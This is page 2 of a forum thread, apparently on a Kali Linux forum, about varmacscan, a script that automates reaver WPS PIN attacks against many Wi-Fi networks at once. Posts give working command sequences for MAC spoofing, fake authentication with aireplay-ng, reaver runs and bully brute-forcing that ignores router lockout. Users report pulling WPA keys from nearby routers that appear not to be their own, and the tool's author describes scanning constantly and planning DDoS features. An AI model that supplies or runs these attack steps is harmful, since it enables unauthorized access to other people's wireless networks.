Page 2 of 2 FirstFirst 12
Results 51 to 65 of 65

Thread: Varmacscan2-0 an automatic multi-target reaver attack tool released

  1. #51
    Join Date
    2013-Jul
    Posts
    818
    To thothao

    First thank you for your interest. This is an important point in a successful reaver WPS/WPA pin/key extraction!

    The aireplay-ng warning is actually an old legacy warning as back in the early days of aircrack-ng and WEP cracking you had to add the -h device mac address to your command line. Later this was changed. If you go to infinityexists.com and dig thru the wep video files you will see them talking about the addition of this feature.

    However there is a simple method to prove what mac address is being used.

    Place a wifi device in monitor mode and spoof the mac

    We use:

    airmon-ng start wlan0

    #To avoid airmon-ng check kill

    ifconfig wlan0mon down
    iwconfig wlan0mon mode monitor
    ifconfig wlan0mon up

    #Now spoof your mac

    ifconfig wlan0mon down
    macchanger -m 00:11:22:33:44:55 wlan0mon
    ifconfig wlan0mon up

    #Now pick a wifi network in your area and point airodump-ng at that network

    airodump-ng -c 1 --bssid 55:44:33:22:11:00 wlan0mon

    #Now open another terminal window and do a fake auth with aireplay-ng against the network

    aireplay-ng -1 10 -a 55:44:33:22:11:00 wlan0mon


    #Now look in your airodump-ng terminal window and you will see below the word "Station", what mac addresses are being used against the network.

    Furthermore:

    While varmacscan is running a airodump-ng xterm window is open. Just expand the xterm window and look at the device mac being used. In closing AND just in case you might have been right and something had changed in linux or aircrack-ng, MTeams tested to see what mac address was being used and found the mac spoofed was in fact still being employed. It is seen in the aireplay-ng ap activation window and is also picked up by airodump-ng.

    Varmacscan scan changes the mac at every cycle and prints the Current Device Mac used in the main menu for this very reason. If your program is using a different mac address then shown for that cycle write us again and we will try and duplicate.


    Musket Teams
    Last edited by mmusket33; 2016-06-09 at 09:19.

  2. #52
    Join Date
    2016-Jun
    Posts
    12
    mmusket33

    I ran the script for a few days and it found 6 pins and one wpa key. I saw attacked APs permanently disabling or locking WPS (well, at least until next reboot, I guess).

    Based on my experience I have a few suggestions:
    1. add --wps option to airodump-ng. Sometimes an AP appears as having WPS not locked during initial wash scan, but locks it permanently or temporarily once attacked. The added option allows to see that in real time.
    I also added --uptime and --manufacturer, don't see any harm in seeing those
    Tip to anyone running airodump with --manufacturer option - run this command to update the reference files used by this feature:
    Code:
    airodump-ng-oui-update
    After I did a few APs that were previously listed as Unknown now show the vendor. And I know one of them is a very old device, so it's not like updating will only add recently allocated macs, I don't know why original reference files are so inferior.
    2. Make naming of PIN and WPA KEY files uniform, starting with BSSID or ESSID, so that PIN and KEY files for the same AP are grouped together in the folder.
    3. Make mac spoofing optional. My builtin VIA adapter appears to have limited implementation of monitor mode and neither reaver nor bully can do **** when the mac is spoofed. Yet I cracked my first few APs using this adapter (not by varmacscan)
    4. I know I'm not the first to suggest it - remove the confirmations
    Last edited by g0tmi1k; 1 Week Ago at 13:25. Reason: Foul language

  3. #53
    Join Date
    2013-Jul
    Posts
    818
    To MajorTom

    Thank you for your observations and suggestions. MTeams are working on using more and more wps info from aerodump-ng for both VMR-MDK and varmacscan. Your other points have been put on a list for consideration. However our current priority is to make available a more effective robotic handshake collector thru handshakeharvest and an updated Pwnstar9.0 with new passive DDOS features using airbase-ng as the DDOSing mechanism. We only got 2016.1 Rolling to remain stable two weeks ago. And testing for three(3) different operating systems ie 1.1,2 and 2016 takes time,

    Reference your macchanging problems

    Try
    airmon-ng start wlan0
    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up

    reaver -i wlan0mon -b 00:01:02:03:04:05 -vv --mac=00:11:22:33:44:55

    or maybe

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
    airmon-ng start wlan0
    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up
    reaver -i wlan0mon -b 00:01:02:03:04:05 -vv --mac=00:11:22:33:44:55


    Let us know if this works better.
    Last edited by mmusket33; 2016-06-14 at 16:33.

  4. #54
    Join Date
    2016-Jun
    Posts
    6
    can someone help me have downloaded this script on kali 2016 version but i cant get it to work thanks in advance !!!

  5. #55
    Join Date
    2013-Jul
    Posts
    818
    To YssDiamond,

    MTeams need more info then "it doesnot work".

    Run from root

    Type chmod 755 Script name

    ./script name

    Arm/luks encryption not supported as MTeams cannot test.

    MTeams

  6. #56
    Join Date
    2016-Jun
    Posts
    6
    also tried that nothing i'am doing everything right thanks for the quick reply and support !

  7. #57
    Join Date
    2016-Jun
    Posts
    6
    problem solved thank you musket !!!

  8. #58
    Join Date
    2016-Jul
    Posts
    1
    How can i use the founded Pin for auth? Network-Manager doesn't seems to support WPS-Pin and the command wpa_cli wps_pin any does not connect my to my Network. I also checked with airodump-ng wlan1mon -c 5 --wps and there is no PBC.

    Thanks for help

  9. #59
    Join Date
    2016-Oct
    Posts
    3
    Hi, when I run varmacscan-K1-2-2016-3-3.sh it gets stuck at choosing Kali version:

    Screenshot1.jpg

    ...so I press Enter and nothing happens - it goes back to previous screen:

    Screenshot2.jpg
    Hope someone can help with that.

  10. #60
    Join Date
    2016-Nov
    Posts
    1
    Thank you MTeam.

    I previously posted about my results, but since there were some incomplete information there I have edited my post to remove (my) speculation and only contain the facts.

    I can confirm that this program works as described by others. I started it about ~48 hours ago, and it found four pins, but no wpa keys.

    Three of the pins listed are identical, and that made me (incorrectly) believe that there was some mistake by varmacscan. But - important detail - two of the essids indicate that it's the same ISP. Possible explanation for the exact same pin in different routers.

    While varmacscan continued running, I inserted the pins it found into bully. I used the -B option (bruteforce), and the -s option ('source' or modified mac addreess on my computer), as well as the -L option (ignore AP lockout) so the command looked like this:

    bully -s <my computer's spoofed mac address> -b <target APs mac address> -B -L <my wireless interface>
    I took a few tries changing my mac address from time to time, and then the router presented the wpa key to me, and it also confirmed that the pin was correct. The last run took about ten minutes.

    After that, I tried the other router from the same ISP. This took about 5 hours of trial and failure with same bully command, until it coughed up the wpa key and confirmed the pin. (These two routers confirmed the exact same pin, as varmacscan told me. I don't know how many customers would trust this ISP if they knew.)

    Conclusion, varmacscan took about 12 hours to find four pins for the ~15 APs within range, but was not efficient in using the pin to make the router give up the wpa key. However, using bully with the -B option and a spoofed mac address (-s option) was effective in the second step of the process.

    Possible recommendation: that bully is integrated into varmacscan. Thanks again MTeam.
    Last edited by Badngood; 2016-11-07 at 10:57. Reason: added new information

  11. #61
    Join Date
    2013-Jul
    Posts
    818
    To Badngood

    Thanks for the report.

    First MTeams wishes to point out that you are using varmacscan exactly as it was designed to be used. Varmacscan usually gets the pin and sometimes gets the WPA key. Getting the WPA key may take a bit of effort from the command line.

    MTeams is currently rewritting this program.

    It will provide several methods of making virtual monitors thru airmon-ng and iw and a mixture of both.

    It will brute force the WPS pin then try any pins found and then try default pins such as 12345670 and 00000000 in sequence.We have begun finding routers with the all zero default key which is something new for us.

    Several AP activation routines will be added. Aireplay-ng will be made regenerative thru while true loops.

    With respect to bully MTeams has made several attempts to integrate bully into these robotic processes but in our areas bully just doesnot function well against the routers found. We therefore cannot test and if we cannot test against real targets we cannot confirm any of the subroutines embedded in the script are actually functioning. However we will again test with Annarchyys version.

    We have found that reaver when run thru Kali 2.0 and latter, many times does not get the WPA key even when run from the commandline. We immediately switch to kali1.10 and the WPA key is obtained. There is commentary in Top-Hat-Sec see http://forum.top-hat-sec.com/index.php?topic=5647.0 There are comments about airmon-ng disruptions and using iw instead. We are exploring this issue hence the reason for alternative virtual monitor setups in coming releases.

    For us this program has obtained more WPA keys then all other methods combined. This is only because of the robotic nature of the script. MTeams runs constant scans 24 hours a day when the computer is idle then try to obtain the WPA key thru the commandline. We will try bully thru the command line again as you suggested.


    Musket Teams

  12. #62
    Join Date
    2015-Jul
    Location
    Around the World
    Posts
    7
    @mmusket33
    I have been testing your "varmacscan" but after updating to "Kali Linux 2016.2" the tools seems to have problem start the "wlan0" in the monitor mode (tried both ways). I have even tried to write a small shell file to overcome this but the problem still persists. It would be better if you add the following to avoid the hardblocked case or "SIOCSIFFLAGS: Operation not possible due to RF-kill". So that the program while creating the "Monitor Mode" doesnt have problem with it.
    And can you say the command you use in the file with reaver and also aireplay-ng?

    Command:
    rmmod -f <Wifi Driver Name> #Removing the Driver
    rfkill unblock all #Unblocking all device
    modprobe <Wifi Driver Name> #Installing the driver module.

    Thanks.

  13. #63
    Join Date
    2013-Jul
    Posts
    818
    To 9h05t

    MTeams currently has two(2) computers running varmacscan in hard drive installs of i386 kali-linux 2016R2. These computers have been updated but not upgraded and have been running constantly for over two months with no difficulties.


    All we can say with the info you provided is to make sure you choose the right program type when asked ie kali 1.10a, 2 and rolling and let the program install the monitors. A common error is to try and write the monitor designation when prompted rather then just selecting the line number next to the device.

    The SIOCSIFFLAGS due to RF kill might be caused because you are running kali linux on a laptop which is dual booted with windows or requires windows to turn on the wifi device. If this is the case boot into windows get your internal wifi device functioning then reboot into linux. This would also apply to usb install both live and persistent. Note the computer writing this answer had this problem last month.


    All we ask at present is to go thru the setup carefully. If the problem persists write back and give us more info but it is hard to correct if we cannot duplicate. We will also put our RV group on it if this answer does not help you,

    You can read the command lines for reaver and aireplay-ng. Just open the file with leafpad and type ctrl - F reaver or aireplay-ng and you will find the various command lines embedded in xterm.



    Musket Teams

  14. #64
    Join Date
    2017-Jan
    Posts
    4
    THX for this nice code.

    How can i create a whitelist for varmacscan-K1-2-2016-3-3.sh? Only a simple text file list of BSSIDs in /root/VARMAC_WHITELST? Like this:

    11:22:33:44:55:66
    77:88:99:00:11:22

    Same for whitelist handshakeharvest-K1-K2-K2016-4-0?

  15. #65
    Join Date
    2013-Jul
    Posts
    818
    Networks are whitelisted by writing a text file and naming the file with the mac code of the network then a dash and the word whitelist. This text file must be placed in the VARMAC_WHITELIST folder. Contents of the file are unimportant. The program looks for file names not contents


    File name example

    55:44:33:22:11:00-whitelist


    The program gives you the option to whitelist Networks during setup and writes the file for you. BUT if you wish to manually whitelist networks prior to running the script then open leafpad enter the mac code of the network in the file as text if you wish then name the file with the mac code then a dash then the word whitelist.

    And again for program looks for maccodes of file names not for file contents and each network has its' own file.

    It was done this way to protect data. Each time a network is cracked the data is written to a separate file. Those networks are then automatically whitelisted and a text file written to the VARMAC_WHITELIST folder. Manually whitelisted networks have the name whitelist after the maccode and dash. Networks that have had their WPA key cracked have the word WPA_key-FOUND- then the essid.

    MTeams decided for data safety each network cracked would have its data written to a individual file in root rather then put all data collected placed in one file. We have seen programs where the user spends hours trying to obtain data and then when found the data iis placed in the /tmp folder.

    Musket Teams
    Last edited by mmusket33; 2017-01-10 at 08:41.

Similar Threads

  1. Replies: 18
    Last Post: 2017-01-12, 01:14
  2. Takes quite long to obtain HID driver on target machine for HID attack
    By simonpunk2016 in forum NetHunter General Questions
    Replies: 1
    Last Post: 2015-06-04, 19:56
  3. A Reaver Based Multi-Target Pin Harvesting Program
    By mmusket33 in forum Community Generated How-Tos
    Replies: 10
    Last Post: 2014-10-29, 02:15

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •